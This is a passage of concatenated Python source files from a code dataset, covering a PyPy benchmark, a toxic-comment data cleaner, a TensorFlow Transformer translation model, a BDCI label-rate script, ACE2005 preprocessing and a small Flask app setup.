randint\nfrom pyspark.sql.functions import col, rand\nfrom pyspark.sql.types import IntegerType\nfrom pyspark.sql.session import SparkSession\n\n\ndef fib(n):\n \"\"\"[summary]\n Calculate Nth Fibonacci sequence value\n Arguments:\n n {int}\n\n Returns:\n int\n \"\"\"\n if n == 0 or n == 1:\n return n\n que = [0, 1]\n while n > 1:\n que.append(que.pop(0) + que[0])\n n -= 1\n return que[1]\n\n\ndef merge_sort(arr):\n n = len(arr)\n que = []\n item_len = 1\n while item_len < n:\n pair_len = item_len * 2\n n_pair = ceil(n / pair_len)\n # divide problem to sub-problem, iterate each pair\n for k in range(n_pair):\n low = i = k * pair_len\n # check array length\n if k == n_pair - 1:\n mid = j = min(low + item_len, n)\n high = n\n else:\n mid = j = low + item_len\n high = low + pair_len\n # merge: append smaller element\n while i < mid and j < high:\n if arr[i] < arr[j]:\n que.append(arr[i])\n i += 1\n else:\n que.append(arr[j])\n j += 1\n # if one item is empty, append all the elements of the other\n que.extend(arr[j:high] if i == mid else arr[i:mid])\n # swap\n que, arr = [], que\n # increase sub-problem length\n item_len *= 2\n return arr\n\n\ndef group_sum_max(df):\n # the second aggregation was left unfinished in the original;\n # taking the max of the per-group sums matches the function name\n return df.groupby(\"id\").agg({\"val\": \"sum\"}).agg({\"sum(val)\": \"max\"})\n\n\ndef unit_test(fn, X, Y, n_iter=100000):\n \"\"\"[summary]\n Correctness and performance testing\n Arguments:\n fn {function} -- function to test\n X {iterable} -- a series of inputs\n Y {iterable} -- expected results\n\n Keyword Arguments:\n n_iter {int} -- number of iterations (default: {100000})\n \"\"\"\n\n print(\"Test %s:\" % fn.__name__)\n # Correctness\n assert all(y0 == y for y0, y in zip(map(fn, X), Y)), \"Test not passed!\"\n print(\"Test passed!\")\n # Performance\n start = time()\n for _ in range(n_iter):\n for x in X:\n fn(x)\n print(\"Time elapsed %.3f\\n\" % (time()-start))\n\n\nif __name__ == \"__main__\":\n # # Test fib\n # X = range(1, 11)\n # Y = [1, 1, 2, 3, 5, 8, 13, 21, 34]\n # unit_test(fib, X, Y)\n\n # # Test merge-sort\n # X = []\n # Y = []\n # for _ in range(1000):\n # L = randint(0, 1000)\n # row = [randint(0, 20) for _ in range(L)]\n # X.append(row)\n # Y.append(sorted(row))\n # unit_test(merge_sort, X, Y, n_iter=1)\n\n # Test spark\n spark = SparkSession.builder.appName(\"test_pypy\").getOrCreate()\n df = spark.range(0, 10**4).withColumn('id', 
(col('id') /\n 10**3).cast('integer')).withColumn('val', rand())\n df.cache()\n df.show()\n res = group_sum_max(df)\n res.show()\n","sub_path":"Other/pypy.py","file_name":"pypy.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"633363898","text":"import sys\nsys.path.append('../preprocess/')\nimport preprocess\nimport pandas as pd\n\ntest_labels = pd.read_csv('../data/test_labels.csv')\ntest = pd.read_csv('../data/test.csv')\n\n# test = pd.concat([test, test_labels], axis=1, sort=False)\ntest = test.merge(test_labels, how='outer').fillna(0)\n\ntest = test[test['toxic'] >= 0]\n\ntest_labels = test.loc[:, ['id', 'toxic','severe_toxic','obscene','threat','insult','identity_hate']]\ntest = test.loc[:, ['id', 'comment_text']]\n\nprint(test_labels.head())\nprint(test.head())\n\ntest_labels.to_csv('../data/clean_test_labels.csv',index=False)\ntest.to_csv('../data/clean_test.csv',index=False)\n\n","sub_path":"evaluation/clean_test.py","file_name":"clean_test.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"232158499","text":"#!/usr/bin/env python3\nimport math\nimport numpy as np\nimport tensorflow as tf\nfrom lib.layers import *\nfrom lib.tensor_utils import *\nfrom collections import namedtuple\nfrom . import TranslateModel\n\n\nclass FFN:\n \"\"\"\n Feed-forward layer\n \"\"\"\n def __init__(self, name,\n inp_size, hid_size, out_size,\n relu_dropout):\n self.name = name\n self.relu_dropout = relu_dropout\n\n with tf.variable_scope(name):\n self.first_conv = Dense(\n 'conv1',\n inp_size, hid_size,\n activation=tf.nn.relu,\n b=tf.zeros_initializer())\n\n self.second_conv = Dense(\n 'conv2',\n hid_size, out_size,\n activation=lambda x: x,\n b=tf.zeros_initializer())\n\n def __call__(self, inputs, params_summary=None):\n \"\"\"\n inp: [batch_size * ninp * inp_dim]\n ---------------------------------\n out: [batch_size * ninp * out_dim]\n \"\"\"\n with tf.variable_scope(self.name):\n hidden = self.first_conv(inputs)\n if is_dropout_enabled():\n hidden = tf.nn.dropout(hidden, 1.0 - self.relu_dropout)\n\n outputs = self.second_conv(hidden)\n\n return outputs\n\n\nclass MultiHeadAttn:\n \"\"\"\n Multihead scaled-dot-product attention with input/output transformations\n \"\"\"\n ATTN_BIAS_VALUE = -1e9\n\n def __init__(\n self, name, inp_size,\n key_depth, value_depth, output_depth,\n num_heads, attn_dropout, attn_value_dropout, debug=False, _format='combined'\n ):\n self.name = name\n self.key_depth = key_depth\n self.value_depth = value_depth\n self.num_heads = num_heads\n self.attn_dropout = attn_dropout\n self.attn_value_dropout = attn_value_dropout\n self.debug = debug\n self.format = _format\n\n with tf.variable_scope(name):\n self.scope = tf.get_variable_scope()\n\n if self.format == 'use_kv':\n self.query_conv = Dense(\n 'query_conv',\n inp_size, key_depth,\n activation=lambda x: x,\n b=tf.zeros_initializer(),\n )\n\n self.kv_conv = Dense(\n 'mem_conv',\n inp_size, key_depth + value_depth,\n activation=lambda x: x,\n b=tf.zeros_initializer(),\n )\n\n self.combined_conv = Dense(\n 'combined_conv',\n inp_size, key_depth * 2 + value_depth,\n activation=lambda x: x,\n W=tf.concat([self.query_conv.W, self.kv_conv.W], axis=1),\n b=tf.concat([self.query_conv.b, self.kv_conv.b], axis=0),\n )\n\n elif self.format == 'combined':\n self.combined_conv = Dense(\n 'mem_conv', # old name for compatibility\n 
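# one projection that emits queries, keys and values concatenated\n 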
inp_size, key_depth * 2 + value_depth,\n activation=lambda x: x,\n b=tf.zeros_initializer())\n\n self.query_conv = Dense(\n 'query_conv',\n inp_size, key_depth,\n activation=lambda x: x,\n W=self.combined_conv.W[:, :key_depth],\n b=self.combined_conv.b[:key_depth],\n )\n\n self.kv_conv = Dense(\n 'kv_conv',\n inp_size, key_depth + value_depth,\n activation=lambda x: x,\n W=self.combined_conv.W[:, key_depth:],\n b=self.combined_conv.b[key_depth:],\n )\n else:\n raise Exception(\"Unexpected format: \" + self.format)\n\n self.out_conv = Dense(\n 'out_conv',\n value_depth, output_depth,\n activation=lambda x: x,\n b=tf.zeros_initializer())\n\n def __call__(self, query_inp, attn_mask, kv_inp=None, kv=None):\n \"\"\"\n query_inp: [batch_size * n_q * inp_dim]\n attn_mask: [batch_size * 1 * n_q * n_kv]\n kv_inp: [batch_size * n_kv * inp_dim]\n -----------------------------------------------\n results: [batch_size * n_q * output_depth]\n \"\"\"\n assert kv is None or kv_inp is None, \"please only feed one of kv or kv_inp\"\n with tf.name_scope(self.name) as scope:\n if kv_inp is not None or kv is not None:\n q = self.query_conv(query_inp)\n if kv is None:\n kv = self.kv_conv(kv_inp)\n k, v = tf.split(kv, [self.key_depth, self.value_depth], axis=2)\n else:\n combined = self.combined_conv(query_inp)\n q, k, v = tf.split(combined, [self.key_depth, self.key_depth, self.value_depth], axis=2)\n q = self._split_heads(q) # [batch_size * n_heads * n_q * (k_dim/n_heads)]\n k = self._split_heads(k) # [batch_size * n_heads * n_kv * (k_dim/n_heads)]\n v = self._split_heads(v) # [batch_size * n_heads * n_kv * (v_dim/n_heads)]\n\n key_depth_per_head = self.key_depth / self.num_heads\n q = q / math.sqrt(key_depth_per_head)\n\n # Dot-product attention\n # logits: (batch_size * n_heads * n_q * n_kv)\n attn_bias = MultiHeadAttn.ATTN_BIAS_VALUE * (1 - attn_mask)\n logits = tf.matmul(\n tf.transpose(q, perm=[0, 1, 2, 3]),\n tf.transpose(k, perm=[0, 1, 3, 2])) + attn_bias\n weights = tf.nn.softmax(logits)\n\n if is_dropout_enabled():\n weights = tf.nn.dropout(weights, 1.0 - self.attn_dropout)\n x = tf.matmul(\n weights, # [batch_size * n_heads * n_q * n_kv]\n tf.transpose(v, perm=[0, 1, 2, 3]) # [batch_size * n_heads * n_kv * (v_deph/n_heads)]\n )\n combined_x = self._combine_heads(x)\n\n if is_dropout_enabled():\n combined_x = tf.nn.dropout(combined_x, 1.0 - self.attn_value_dropout)\n\n outputs = self.out_conv(combined_x)\n return outputs\n\n def _split_heads(self, x):\n \"\"\"\n Split channels (dimension 3) into multiple heads (dimension 1)\n input: (batch_size * ninp * inp_dim)\n output: (batch_size * n_heads * ninp * (inp_dim/n_heads))\n \"\"\"\n old_shape = x.get_shape().dims\n dim_size = old_shape[-1]\n new_shape = old_shape[:-1] + [self.num_heads] + [dim_size // self.num_heads if dim_size else None]\n ret = tf.reshape(x, tf.concat([tf.shape(x)[:-1], [self.num_heads, -1]], 0))\n ret.set_shape(new_shape)\n return tf.transpose(ret, [0, 2, 1, 3]) # [batch_size * n_heads * ninp * (hid_dim//n_heads)]\n\n def _combine_heads(self, x):\n \"\"\"\n Inverse of split heads\n input: (batch_size * n_heads * ninp * (inp_dim/n_heads))\n out: (batch_size * ninp * inp_dim)\n \"\"\"\n x = tf.transpose(x, [0, 2, 1, 3])\n old_shape = x.get_shape().dims\n a, b = old_shape[-2:]\n new_shape = old_shape[:-2] + [a * b if a and b else None]\n ret = tf.reshape(x, tf.concat([tf.shape(x)[:-2], [-1]], 0))\n ret.set_shape(new_shape)\n ret = tf.transpose(ret, perm=[0, 1, 2])\n return ret\n\n\nclass Transformer:\n def __init__(\n self, name,\n 
inp_voc, out_voc,\n *_args,\n emb_size=None, hid_size=512,\n key_size=None, value_size=None,\n inner_hid_size=None, # DEPRECATED. Left for compatibility with older experiments\n ff_size=None,\n num_heads=8, num_layers=6,\n attn_dropout=0.0, attn_value_dropout=0.0, relu_dropout=0.0, res_dropout=0.1,\n debug=None, share_emb=False, inp_emb_bias=False, rescale_emb=False,\n dst_reverse=False, dst_rand_offset=False,\n res_steps='ldan', normalize_out=False, multihead_attn_format='v1', **_kwargs\n ):\n\n if isinstance(ff_size, str):\n ff_size = [int(i) for i in ff_size.split(':')]\n\n if _args:\n raise Exception(\"Unexpected positional arguments\")\n\n emb_size = emb_size if emb_size else hid_size\n key_size = key_size if key_size else hid_size\n value_size = value_size if value_size else hid_size\n if key_size % num_heads != 0:\n raise Exception(\"Bad number of heads\")\n if value_size % num_heads != 0:\n raise Exception(\"Bad number of heads\")\n\n self.name = name\n self.num_layers_enc = num_layers\n self.num_layers_dec = num_layers\n self.res_dropout = res_dropout\n self.emb_size = emb_size\n self.hid_size = hid_size\n self.rescale_emb = rescale_emb\n self.dst_reverse = dst_reverse\n self.dst_rand_offset = dst_rand_offset\n self.normalize_out = normalize_out\n\n with tf.variable_scope(name):\n max_voc_size = max(len(inp_voc), len(out_voc))\n self.emb_inp = Embedding(\n 'emb_inp', max_voc_size if share_emb else len(inp_voc), emb_size,\n initializer=tf.random_normal_initializer(0, emb_size**-.5))\n\n emb_out_matrix = None\n if share_emb:\n emb_out_matrix = self.emb_inp.mat\n self.emb_out = Embedding(\n 'emb_out', max_voc_size if share_emb else len(out_voc), emb_size,\n matrix=emb_out_matrix,\n initializer=tf.random_normal_initializer(0, emb_size**-.5))\n\n self.emb_inp_bias = 0\n if inp_emb_bias:\n self.emb_inp_bias = tf.get_variable('emb_inp_bias', shape=[1, 1, emb_size])\n\n # Encoder Layers\n self.enc_attn = [ResidualLayerWrapper(\n 'enc_attn-%i' % i,\n MultiHeadAttn(\n 'enc_attn-%i' % i,\n inp_size=emb_size if i == 0 else hid_size,\n key_depth=key_size,\n value_depth=value_size,\n output_depth=hid_size,\n num_heads=num_heads,\n attn_dropout=attn_dropout,\n attn_value_dropout=attn_value_dropout,\n debug=debug),\n inp_size=emb_size if i == 0 else hid_size,\n out_size=emb_size if i == 0 else hid_size,\n steps=res_steps,\n dropout=res_dropout)\n for i in range(self.num_layers_enc)]\n\n self.enc_ffn = [ResidualLayerWrapper(\n 'enc_ffn-%i' % i,\n FFN(\n 'enc_ffn-%i' % i,\n inp_size=emb_size if i == 0 else hid_size,\n hid_size=ff_size if ff_size else (inner_hid_size if inner_hid_size else hid_size),\n out_size=hid_size,\n relu_dropout=relu_dropout),\n inp_size=emb_size if i == 0 else hid_size,\n out_size=hid_size,\n steps=res_steps,\n dropout=res_dropout)\n for i in range(self.num_layers_enc)]\n\n if self.normalize_out:\n self.enc_out_norm = LayerNorm('enc_out_norm', inp_size=emb_size if self.num_layers_enc == 0 else hid_size)\n\n # Decoder layers\n self.dec_attn = [ResidualLayerWrapper(\n 'dec_attn-%i' % i,\n MultiHeadAttn(\n 'dec_attn-%i' % i,\n inp_size=emb_size if i == 0 else hid_size,\n key_depth=key_size,\n value_depth=value_size,\n output_depth=hid_size,\n num_heads=num_heads,\n attn_dropout=attn_dropout,\n attn_value_dropout=attn_value_dropout,\n debug=debug),\n inp_size=emb_size if i == 0 else hid_size,\n out_size=emb_size if i == 0 else hid_size,\n steps=res_steps,\n dropout=res_dropout)\n for i in range(self.num_layers_dec)]\n\n self.dec_enc_attn = [ResidualLayerWrapper(\n 
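# encoder-decoder attention: decoder positions attend over the encoder output\n 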
'dec_enc_attn-%i' % i,\n MultiHeadAttn(\n 'dec_enc_attn-%i' % i,\n inp_size=emb_size if i == 0 else hid_size,\n key_depth=key_size,\n value_depth=value_size,\n output_depth=hid_size,\n num_heads=num_heads,\n attn_dropout=attn_dropout,\n attn_value_dropout=attn_value_dropout,\n debug=debug,\n _format='use_kv' if multihead_attn_format == 'v1' else 'combined',\n ),\n inp_size=emb_size if i == 0 else hid_size,\n out_size=emb_size if i == 0 else hid_size,\n steps=res_steps,\n dropout=res_dropout)\n for i in range(self.num_layers_dec)]\n\n self.dec_ffn = [ResidualLayerWrapper(\n 'dec_ffn-%i' % i,\n FFN(\n 'dec_ffn-%i' % i,\n inp_size=emb_size if i == 0 else hid_size,\n hid_size=ff_size if ff_size else hid_size,\n out_size=hid_size,\n relu_dropout=relu_dropout),\n inp_size=emb_size if i == 0 else hid_size,\n out_size=hid_size,\n steps=res_steps,\n dropout=res_dropout)\n for i in range(self.num_layers_dec)]\n\n if self.normalize_out:\n self.dec_out_norm = LayerNorm('dec_out_norm', inp_size=emb_size if self.num_layers_dec == 0 else hid_size)\n\n def encode(self, inp, inp_len, is_train):\n with dropout_scope(is_train), tf.name_scope(self.name + '_enc') as scope:\n\n # Embeddings\n emb_inp = self.emb_inp(inp) # [batch_size * ninp * emb_dim]\n if self.rescale_emb:\n emb_inp *= self.emb_size ** .5\n emb_inp += self.emb_inp_bias\n\n # Prepare decoder\n enc_attn_mask = self._make_enc_attn_mask(inp, inp_len) # [batch_size * 1 * 1 * ninp]\n\n enc_inp = self._add_timing_signal(emb_inp)\n\n # Apply dropouts\n if is_dropout_enabled():\n enc_inp = tf.nn.dropout(enc_inp, 1.0 - self.res_dropout)\n\n # Encoder\n for layer in range(self.num_layers_enc):\n enc_inp = self.enc_attn[layer](enc_inp, enc_attn_mask)\n enc_inp = self.enc_ffn[layer](enc_inp)\n\n if self.normalize_out:\n enc_inp = self.enc_out_norm(enc_inp)\n\n enc_out = enc_inp\n\n return enc_out, enc_attn_mask\n\n def decode(self, out, out_len, out_reverse, enc_out, enc_attn_mask, is_train):\n with dropout_scope(is_train), tf.name_scope(self.name + '_dec') as scope:\n # Embeddings\n emb_out = self.emb_out(out) # [batch_size * nout * emb_dim]\n if self.rescale_emb:\n emb_out *= self.emb_size ** .5\n\n # Shift right; drop embedding for last word\n emb_out = tf.pad(emb_out, [[0, 0], [1, 0], [0, 0]])[:, :-1, :]\n\n # Prepare decoder\n dec_attn_mask = self._make_dec_attn_mask(out) # [1 * 1 * nout * nout]\n\n offset = 'random' if self.dst_rand_offset else 0\n dec_inp = self._add_timing_signal(emb_out, offset=offset, inp_reverse=out_reverse)\n # Apply dropouts\n if is_dropout_enabled():\n dec_inp = tf.nn.dropout(dec_inp, 1.0 - self.res_dropout)\n\n # bypass info from Encoder to avoid None gradients for num_layers_dec == 0\n if self.num_layers_dec == 0:\n inp_mask = tf.squeeze(tf.transpose(enc_attn_mask, perm=[3,1,2,0]),3)\n dec_inp += tf.reduce_mean(enc_out * inp_mask, axis=[0,1], keep_dims=True)\n\n # Decoder\n for layer in range(self.num_layers_dec):\n dec_inp = self.dec_attn[layer](dec_inp, dec_attn_mask)\n dec_inp = self.dec_enc_attn[layer](dec_inp, enc_attn_mask, enc_out)\n dec_inp = self.dec_ffn[layer](dec_inp)\n\n if self.normalize_out:\n dec_inp = self.dec_out_norm(dec_inp)\n\n dec_out = dec_inp\n return dec_out\n\n def _make_enc_attn_mask(self, inp, inp_len, dtype=tf.float32):\n \"\"\"\n inp = [batch_size * ninp]\n inp_len = [batch_size]\n\n attn_mask = [batch_size * 1 * 1 * ninp]\n \"\"\"\n with tf.variable_scope(\"make_enc_attn_mask\"):\n inp_mask = tf.sequence_mask(inp_len, dtype=dtype, maxlen=tf.shape(inp)[1])\n\n attn_mask = inp_mask[:, None, None, 
:]\n return attn_mask\n\n def _make_dec_attn_mask(self, out, dtype=tf.float32):\n \"\"\"\n out = [batch_size * nout]\n\n attn_mask = [1 * 1 * nout * nout]\n \"\"\"\n with tf.variable_scope(\"make_dec_attn_mask\"):\n length = tf.shape(out)[1]\n lower_triangle = tf.matrix_band_part(tf.ones([length, length], dtype=dtype), -1, 0)\n attn_mask = tf.reshape(lower_triangle, [1, 1, length, length])\n return attn_mask\n\n def _add_timing_signal(self, inp, min_timescale=1.0, max_timescale=1.0e4, offset=0, inp_reverse=None):\n \"\"\"\n inp: (batch_size * ninp * hid_dim)\n :param offset: add this number to all character positions.\n if offset == 'random', picks this number uniformly from [-32000,32000] integers\n :type offset: number, tf.Tensor or 'random'\n \"\"\"\n with tf.variable_scope(\"add_timing_signal\"):\n ninp = tf.shape(inp)[1]\n hid_size = tf.shape(inp)[2]\n\n position = tf.to_float(tf.range(ninp))[None, :, None]\n\n if offset == 'random':\n BIG_LEN = 32000\n offset = tf.random_uniform(tf.shape(position), minval=-BIG_LEN, maxval=BIG_LEN, dtype=tf.int32)\n\n # force broadcasting over batch axis\n if isinstance(offset * 1, tf.Tensor): # multiply by 1 to also select variables, special generators, etc.\n assert offset.shape.ndims in (0, 1, 2)\n new_shape = [tf.shape(offset)[i] for i in range(offset.shape.ndims)]\n new_shape += [1] * (3 - len(new_shape))\n offset = tf.reshape(offset, new_shape)\n\n position += tf.to_float(offset)\n\n if inp_reverse is not None:\n position = tf.multiply(\n position,\n tf.where(\n tf.equal(inp_reverse, 0),\n tf.ones_like(inp_reverse, dtype=tf.float32),\n -1.0 * tf.ones_like(inp_reverse, dtype=tf.float32)\n )[:, None, None] # (batch_size * ninp * dim)\n )\n num_timescales = hid_size // 2\n log_timescale_increment = (\n math.log(float(max_timescale) / float(min_timescale)) /\n (tf.to_float(num_timescales) - 1))\n inv_timescales = min_timescale * tf.exp(\n tf.to_float(tf.range(num_timescales)) * -log_timescale_increment)\n\n # scaled_time: [ninp * hid_dim]\n scaled_time = position * inv_timescales[None, None, :]\n signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=-1)\n signal = tf.pad(signal, [[0, 0], [0, 0], [0, tf.mod(hid_size, 2)]])\n return inp + signal\n\n\n# ============================================================================\n# Transformer model\n\nclass Model(TranslateModel):\n\n DecState = namedtuple(\"transformer_state\", ['enc_out', 'enc_attn_mask', 'attnP', 'rdo', 'out_seq', 'offset',\n 'emb', 'dec_layers', 'dec_enc_kv', 'dec_dec_kv'])\n\n def __init__(self, name, inp_voc, out_voc, **hp):\n self.name = name\n self.inp_voc = inp_voc\n self.out_voc = out_voc\n self.hp = hp\n self.debug = hp.get('debug', None)\n\n # Parameters\n self.transformer = Transformer(name, inp_voc, out_voc, **hp)\n\n projection_matrix = None\n if hp.get('dwwt', False):\n projection_matrix = tf.transpose(self.transformer.emb_out.mat)\n\n with tf.variable_scope(name):\n self.logits = Dense('logits', self.transformer.hid_size, len(out_voc),\n W=projection_matrix)\n\n # Train interface\n def symbolic_score(self, inp, out, is_train=False):\n inp_len = infer_length(inp, self.inp_voc.eos, time_major=False)\n out_len = infer_length(out, self.out_voc.eos, time_major=False)\n\n out_reverse = tf.zeros_like(inp_len) # batch['out_reverse']\n\n # rdo: [batch_size * nout * hid_dim]\n enc_out, enc_attn_mask = self.transformer.encode(inp, inp_len, is_train)\n rdo = self.transformer.decode(out, out_len, out_reverse, enc_out, enc_attn_mask, is_train)\n\n return 
self.logits(rdo)\n\n def encode(self, batch, is_train=False, **kwargs):\n \"\"\"\n :param batch: a dict containing 'inp':int32[batch_size * ninp] and optionally inp_len:int32[batch_size]\n :param is_train: if True, enables dropouts\n \"\"\"\n inp = batch['inp']\n inp_len = batch.get('inp_len', infer_length(inp, self.inp_voc.eos, time_major=False))\n with dropout_scope(is_train), tf.name_scope(self.transformer.name):\n if self.debug:\n inp = tf.Print(inp, [tf.shape(inp), inp], message=\"encode(): inp\", first_n=100, summarize=100)\n\n # Encode.\n enc_out, enc_attn_mask = self.transformer.encode(inp, inp_len, is_train=False)\n\n # Decoder dummy input/output\n ninp = tf.shape(inp)[1]\n batch_size = tf.shape(inp)[0]\n hid_size = tf.shape(enc_out)[-1]\n out_seq = tf.zeros([batch_size, 0], dtype=inp.dtype)\n rdo = tf.zeros([batch_size, hid_size], dtype=enc_out.dtype)\n\n attnP = tf.ones([batch_size, ninp]) / tf.to_float(inp_len)[:, None]\n\n offset = tf.zeros((batch_size,))\n if self.transformer.dst_rand_offset:\n BIG_LEN = 32000\n random_offset = tf.random_uniform(tf.shape(offset), minval=-BIG_LEN, maxval=BIG_LEN, dtype=tf.int32)\n offset += tf.to_float(random_offset)\n\n trans = self.transformer\n empty_emb = tf.zeros([batch_size, 0, trans.emb_size])\n empty_dec_layers = [tf.zeros([batch_size, 0, trans.hid_size])] * trans.num_layers_dec\n input_layers = [empty_emb] + empty_dec_layers[:-1]\n\n #prepare kv parts for all decoder attention layers. Note: we do not preprocess enc_out\n # for each layer because ResidualLayerWrapper only preprocesses first input (query)\n dec_enc_kv = [layer.kv_conv(enc_out)\n for i, layer in enumerate(trans.dec_enc_attn)]\n dec_dec_kv = [layer.kv_conv(layer.preprocess(input_layers[i]))\n for i, layer in enumerate(trans.dec_attn)]\n\n new_state = self.DecState(enc_out, enc_attn_mask, attnP, rdo, out_seq, offset,\n empty_emb, empty_dec_layers, dec_enc_kv, dec_dec_kv)\n\n # perform initial decode (instead of force_bos) with zero embeddings\n new_state = self.decode(new_state, is_train=is_train)\n return new_state\n\n def decode(self, dec_state, words=None, is_train=False, **kwargs):\n \"\"\"\n Performs decoding step given words and previous state.\n Returns next state.\n\n :param words: previous output tokens, int32[batch_size]. 
If None, uses zero embeddings (first step)\n :param is_train: if True, enables dropouts\n \"\"\"\n trans = self.transformer\n enc_out, enc_attn_mask, attnP, rdo, out_seq, offset, prev_emb = dec_state[:7]\n prev_dec_layers = dec_state.dec_layers\n dec_enc_kv = dec_state.dec_enc_kv\n dec_dec_kv = dec_state.dec_dec_kv\n\n batch_size = tf.shape(rdo)[0]\n if words is not None:\n out_seq = tf.concat([out_seq, tf.expand_dims(words, 1)], 1)\n\n with dropout_scope(is_train), tf.name_scope(trans.name):\n # Embeddings\n if words is None:\n # initial step: words are None\n emb_out = tf.zeros((batch_size, 1, trans.emb_size))\n else:\n emb_out = trans.emb_out(words[:, None]) # [batch_size * 1 * emb_dim]\n if trans.rescale_emb:\n emb_out *= trans.emb_size ** .5\n\n # Prepare decoder\n dec_inp_t = trans._add_timing_signal(emb_out, offset=offset)\n # Apply dropouts\n if is_dropout_enabled():\n dec_inp_t = tf.nn.dropout(dec_inp_t, 1.0 - trans.res_dropout)\n\n # bypass info from Encoder to avoid None gradients for num_layers_dec == 0\n if trans.num_layers_dec == 0:\n inp_mask = tf.squeeze(tf.transpose(enc_attn_mask, perm=[3, 1, 2, 0]), 3)\n dec_inp_t += tf.reduce_mean(enc_out * inp_mask, axis=[0, 1], keep_dims=True)\n\n # Decoder\n new_emb = tf.concat([prev_emb, dec_inp_t], axis=1)\n _out = tf.pad(out_seq, [(0, 0), (0, 1)])\n dec_attn_mask = trans._make_dec_attn_mask(_out)[:, :, -1:, :] # [1, 1, n_q=1, n_kv]\n\n new_dec_layers = []\n new_dec_dec_kv = []\n\n for layer in range(trans.num_layers_dec):\n # multi-head self-attention: use only the newest time-step as query,\n # but all time-steps up to newest one as keys/values\n next_dec_kv = trans.dec_attn[layer].kv_conv(trans.dec_attn[layer].preprocess(dec_inp_t))\n new_dec_dec_kv.append(tf.concat([dec_dec_kv[layer], next_dec_kv], axis=1))\n dec_inp_t = trans.dec_attn[layer](dec_inp_t, dec_attn_mask, kv=new_dec_dec_kv[layer])\n\n dec_inp_t = trans.dec_enc_attn[layer](dec_inp_t, enc_attn_mask, kv=dec_enc_kv[layer])\n dec_inp_t = trans.dec_ffn[layer](dec_inp_t)\n\n new_dec_inp = tf.concat([prev_dec_layers[layer], dec_inp_t], axis=1)\n new_dec_layers.append(new_dec_inp)\n\n if trans.normalize_out:\n dec_inp_t = trans.dec_out_norm(dec_inp_t)\n\n rdo = dec_inp_t[:, -1]\n\n new_state = self.DecState(enc_out, enc_attn_mask, attnP, rdo, out_seq, offset + 1,\n new_emb, new_dec_layers, dec_enc_kv, new_dec_dec_kv)\n return new_state\n\n def get_rdo(self, dec_state, **kwargs):\n return dec_state.rdo, dec_state.out_seq\n\n def get_attnP(self, dec_state, **kwargs):\n return dec_state.attnP\n\n def get_logits(self, dec_state, **flags):\n return self.logits(dec_state.rdo)\n","sub_path":"models/transformer_other.py","file_name":"transformer_other.py","file_ext":"py","file_size_in_byte":27105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"252483446","text":"#-*- coding=utf-8-*-\n\nimport os\nimport os.path\nimport numpy as np\nimport functools\nimport sys\nimport random\n\n# set up the various data paths\nroot = '/mnt/lustre/niuyazhe'\ntrain_seg = os.path.join(root, 'data/BDCI/train_set/category')\nrate_list = []\n\ndef get_file_rate(num):\n all_train_file = os.listdir(train_seg)\n all_train_file = random.sample(all_train_file, num)\n\n i = 0\n for train_file in all_train_file:\n rates = [0 for k in range(8)]\n content = list(np.loadtxt(os.path.join(train_seg, train_file)).astype(np.int64).tolist())\n for j in content:\n rates[j] += 1\n rates = [rates[i] / len(content) for i in range(8)]\n rate_list.append([train_file, rates])\n 
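# log each sampled file as it is processed\n 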
print(train_file + ' ' + str(i))\n i += 1\n\n with open(os.path.join(root, 'data/BDCI/rate.txt'), 'w') as rate_file:\n output = '\\n'\n rates = [0 for k in range(8)]\n for pair in rate_list:\n output += (pair[0] + ' ' + str(pair[1]) + '\\n')\n rates = [rates[i] + pair[1][i] for i in range(8)]\n rates = [rates[i] / num for i in range(8)]\n print(rates)\n rate_file.writelines(output)\n\nif __name__ == '__main__':\n get_file_rate(int(sys.argv[1]))","sub_path":"get_file_rate.py","file_name":"get_file_rate.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127929690","text":"import os\nfrom parser import Parser\nimport json\nimport argparse\n\n\ndef get_data_paths(ace2005_path):\n test_files, dev_files, train_files = [], [], []\n\n with open('./data_list.csv', mode='r') as csv_file:\n rows = csv_file.readlines()\n for row in rows[1:]:\n items = row.replace('\\n', '').split(',')\n data_type = items[0]\n name = items[1]\n\n path = os.path.join(ace2005_path, name + '.apf.xml')\n if data_type == 'test':\n test_files.append(path)\n elif data_type == 'dev':\n dev_files.append(path)\n elif data_type == 'train':\n train_files.append(path)\n return test_files, dev_files, train_files\n\n\ndef preprocessing(data_type, files):\n data = []\n for file in files:\n data.extend(Parser(xml_path=file).get_data())\n with open('output/{}.json'.format(data_type), 'w') as f:\n json.dump(data, f, indent=2)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--data', help=\"Path of ACE2005 English data\", default='./data/ace_2005_td_v7/data/English')\n args = parser.parse_args()\n test_files, dev_files, train_files = get_data_paths(args.data)\n preprocessing('test', test_files)\n preprocessing('train', train_files)\n preprocessing('dev', dev_files)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"606155149","text":"# -*- coding: utf-8 -*-\r\nfrom flask import Flask \r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_marshmallow import Marshmallow\r\n\r\n\r\napp = None\r\ndb = None\r\n\r\napp = Flask(__name__) # create the application instance :)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///db.sqlite\"\r\ndb = SQLAlchemy(app)\r\nma = Marshmallow(app)\r\n\r\ndel Flask\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"219094077","text":"#!/usr/bin/env python3\n\n\"\"\"\n Add a C file with matching header to the Tor codebase. 
